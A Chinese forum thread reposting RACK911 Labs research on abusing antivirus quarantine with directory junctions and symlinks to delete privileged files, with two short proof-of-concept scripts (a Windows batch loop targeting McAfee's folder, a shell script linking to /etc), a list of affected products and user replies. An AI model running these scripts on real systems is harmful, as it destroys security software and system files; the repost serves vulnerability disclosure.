【转载】部分杀软漏洞可以破坏其自身或系统

huangsijun17 · 发表于 2020-4-22 13:10

原帖地址：https://www.rack911labs.com/research/exploiting-almost-every-antivirus-software/
原作者：RACK911 Labs

思路：使用Windows的目录连接或macOS和Linux的符号链接将反病毒软件转变为自我毁灭的工具。

原理：防病毒软件会实时或间断性得执行"实时扫描"，如果发现可疑程序，则该文件会被自动隔离并移动到安全位置，等待用户确认如何处理。由于这一工作原理，且几乎所有反病毒软件都在最高权限运行，包括进行文件操作时。那么，恶意程序就可以利用这一特性，在反病毒软件扫描后、清理操作之前的时间窗口里，将被扫描成可疑的文件替换为其他文件的符号链接，从而实现提权删除指定文件。

由于默认情况下，Windows的目录连接或macOS和Linux的符号链接无需最高权限，极易被利用。

[Bash shell] 纯文本查看 复制代码

Windows验证代码（McAfee为例）
:loop
rd /s /q C:\Users\Username\Desktop\exploit
mkdir C:\Users\Username\Desktop\exploit
echo X5O!P%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* > C:\Users\Username\Desktop\exploit\EpSecApiLib.dll
rd /s /q C:\Users\Username\Desktop\exploit
mklink /J C:\Users\Username\Desktop\exploit “C:\Program Files (x86)\McAfee\Endpoint Security\Endpoint Security Platform”
goto loop

[Bash shell] 纯文本查看 复制代码

macOS&Linux验证代码（系统密码存储文件为例）
#!/bin/sh
rm -rf /Users/Username/exploit ; mkdir /Users/Username/exploit
curl -k https://pastebin.com/raw/jZJ6Ekzt > /Users/Username/exploit/passwd
sleep 6
rm -rf /Users/Username/exploit ; ln -s /etc /Users/Username/exploit

验证视频详见原网址。

受影响的软件

Windows平台：

Avast Free Anti-Virus
Avira Free Anti-Virus
BitDefender GravityZone
Comodo Endpoint Security
F-Secure Computer Protection
FireEye Endpoint Security
Intercept X (Sophos)
Kaspersky Endpoint Security
Malwarebytes for Windows
McAfee Endpoint Security
Panda Dome
Webroot Secure Anywhere

MacOS：

AVG
BitDefender Total Security
Eset Cyber Security
Kaspersky Internet Security
McAfee Total Protection
Microsoft Defender (BETA)
Norton Security
Sophos Home
Webroot Secure Anywhere

Linux：

BitDefender GravityZone
Comodo Endpoint Security
Eset File Server Security
F-Secure Linux Security
Kaspersy Endpoint Security
McAfee Endpoint Security
Sophos Anti-Virus for Linux

fc4lee · 发表于 2020-4-22 21:50

其实还有个可以利用的机制，就是隔离区这个，一般杀毒软件都得安装在系统盘符，隔离区一般默认也设置在系统盘符，隔离区也会随着隔离文件的日益增多而越来越臃肿庞大（几乎很少用户会取消隔离区或者定期清理隔离区），肯定可以构造把磁盘填满无法正常开机的恶意代码，这是毋庸置疑的

huangsijun17 · 发表于 2020-4-22 13:28

我的爱是你发表于 2020-4-22 13:24
这是借刀杀人。
很不错那么怎么判断杀软将其判为可疑软件呢，还是说释放个必定被杀软检测的软件随后借其 ...

验证代码里面有……
境外实验室都实测出一串软件了。

我的爱是你 · 发表于 2020-4-22 13:24

本帖最后由我的爱是你于 2020-4-22 13:26 编辑

这是借刀杀人。
很不错那么怎么判断杀软将其判为可疑软件呢，还是说释放个必定被杀软检测的软件随后借其之手破坏系统文件。

Xw丶小威 · 发表于 2020-4-22 13:29

好一个偷梁换柱，好一个借刀杀人。

余佳卓 · 发表于 2020-4-22 13:57

长见识了

春天的萌动 · 发表于 2020-4-22 14:02

那样怎么解决呢？

huangsijun17 · 发表于 2020-4-22 14:04

春天的萌动发表于 2020-4-22 14:02
那样怎么解决呢？

等杀软更新……
列表里的软件，境外的实验室都通知了。

那年夏天52 · 发表于 2020-4-22 14:11

比如我杀我自己？？？

Ldfd · 发表于 2020-4-22 14:14

自己打残自己，残忍

gky86886 · 发表于 2020-4-22 14:31

还是裸奔安全

帐号		自动登录	找回密码
密码			注册[Register]

[漏洞分析] 【转载】部分杀软漏洞可以破坏其自身或系统

免费评分

个人中心